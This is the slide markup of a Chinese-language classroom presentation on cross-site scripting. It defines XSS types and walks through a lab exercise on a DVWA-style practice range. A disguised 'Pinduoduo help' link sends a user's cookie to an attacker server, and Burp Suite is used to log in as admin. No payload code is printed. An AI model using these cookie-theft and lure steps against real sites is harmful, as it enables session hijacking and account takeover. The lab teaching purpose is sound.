            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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 XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-Impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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ECEDD6A-9DF9-FE52-ED9F-5EFACDA36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87" y="1788910"/>
            <a:ext cx="5762548" cy="93865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C688A57-E20E-25CE-4F00-D11026C5E612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="10438983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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Impossible_DOM</a:t>
            </a:r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为例：</a:t>
            </a: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在输入框中输入数据后发现嵌入网页源码中的数据是经过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URL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编码的，说明程序对用户输入的数据没有进行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URL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解码，然后直接赋值给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option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标签，因此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很难利用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XSS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漏洞。</a:t>
            </a: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sz="2400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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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003A0EA-21F0-9BED-D4A9-108B676CC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31" y="3606475"/>
            <a:ext cx="5997460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9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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场漏洞攻击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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="10438983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92C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>通过上述注入我们能发现前三个级别的靶场网页存在可注入的漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="800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r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>下面我们以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>Low_DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>级别网页为例，</a:t>
            </a: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sz="800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r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>工具从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>机获得用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>进入网页。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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第一步：伪造链接将用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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cookie</a:t>
            </a:r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值发送给攻击者服务端</a:t>
            </a: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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>拼多多助力一下🌹</a:t>
            </a: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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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7746A67-9C49-F529-4E76-D473C7E57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35" y="3241550"/>
            <a:ext cx="7840897" cy="63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55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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场漏洞攻击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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="1043898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第二步：假设用户在用该页面时（服务器保存着该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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cookie</a:t>
            </a:r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值）点击了恶意链接</a:t>
            </a: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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>拼多多助力一下🌹</a:t>
            </a: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没搭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>服务器，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>进行抓包</a:t>
            </a:r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，获取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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D4843E-FBD1-248B-5A91-6CB613EE6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61" y="2922525"/>
            <a:ext cx="8245555" cy="32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57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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场漏洞攻击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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="104389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第三步：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Burpsuite</a:t>
            </a:r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构造伪造用户的请求包，成功以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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admin</a:t>
            </a:r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身份登录网页。</a:t>
            </a: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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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9DBE77-61B4-51D3-A045-157C2ABE4C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" t="17715" r="265" b="13781"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="774933" y="1752931"/>
            <a:ext cx="7002586" cy="372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92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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场漏洞攻击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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1379382"/>
            <a:ext cx="104389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第三步：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Burpsuite</a:t>
            </a:r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构造伪造用户的请求包，成功以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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admin</a:t>
            </a:r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身份登录网页。</a:t>
            </a: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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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4C2F62-3773-D3E2-E1F7-2782D538D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61" y="1912240"/>
            <a:ext cx="8855207" cy="42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08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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场漏洞攻击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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760462" y="1363752"/>
            <a:ext cx="104389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进一步：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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攻击者修改网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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cookie</a:t>
            </a:r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值后，即可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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admin</a:t>
            </a:r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身份访问该网页各种资源</a:t>
            </a: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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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5A6B5B-D6AA-B56F-9AB5-D9FD11602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682" y="1906782"/>
            <a:ext cx="4861981" cy="12269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3F4B36B-767D-71CC-05B0-0C5BBC13C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682" y="3512488"/>
            <a:ext cx="6988146" cy="19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4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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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攻击过程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7E5855-A31A-1457-A181-65BBAA81ECDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="1351508"/>
            <a:ext cx="960273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292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>跨站脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>）攻击是一种注入式攻击。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>攻击者通过网络向毫无戒心的用户发送恶意脚本。如果终端用户点击该恶意脚本，其浏览器无法判断该脚本是否应该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>被信任</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>没有进行验证或编码，直接执行该脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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，则有可能被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>恶意脚本访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>、会话令牌或其他由浏览器保留并用于该网站的敏感信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>甚至有些恶意脚本可以重写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>页面的内容，从而造成严重的威胁。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="字魂59号-创粗黑" panose="000005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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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五、参考资料</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="ïšľíḍè">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382F6994-D8DF-F340-E84A-825CF5DD8915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="1288006"/>
            <a:ext cx="11077310" cy="16466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buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>[1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/cui_yonghua/article/details/126579098</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="字魂59号-创粗黑" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="字魂5号-无外润黑体" panose="00000500000000000000" pitchFamily="2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SzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>[2] 《Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>安全攻防从入门到精通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>》 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>北京大学出版社</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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2135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 5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感谢您的观看与倾听！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="副标题 52"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041525" y="5840173"/>
            <a:ext cx="8108950" cy="296271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SHANGHAI JIAO TONG UNIVERSITY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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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攻击过程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9773160-9112-96BB-3881-50B6AD776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63" y="1444936"/>
            <a:ext cx="10013245" cy="461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33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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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类型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E2C8F3-A339-9C25-0589-40BCF798D623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760464" y="1351508"/>
            <a:ext cx="1012202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反射型（非持久型）：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攻击者以某种方式诱导用户访问一个精心设计的恶意链接。当用户访问该链接时，会执行攻击者构造的恶意脚本。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system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4D4D4D"/>
              </a:solidFill>
              <a:latin typeface="-apple-system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  <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>存储型（持久型）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>：攻击者提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>漏洞利用代码到一个其他用户可能访问的公用网站，一旦用户访问受感染的网站，将自动执行攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:latin typeface="-apple-system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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
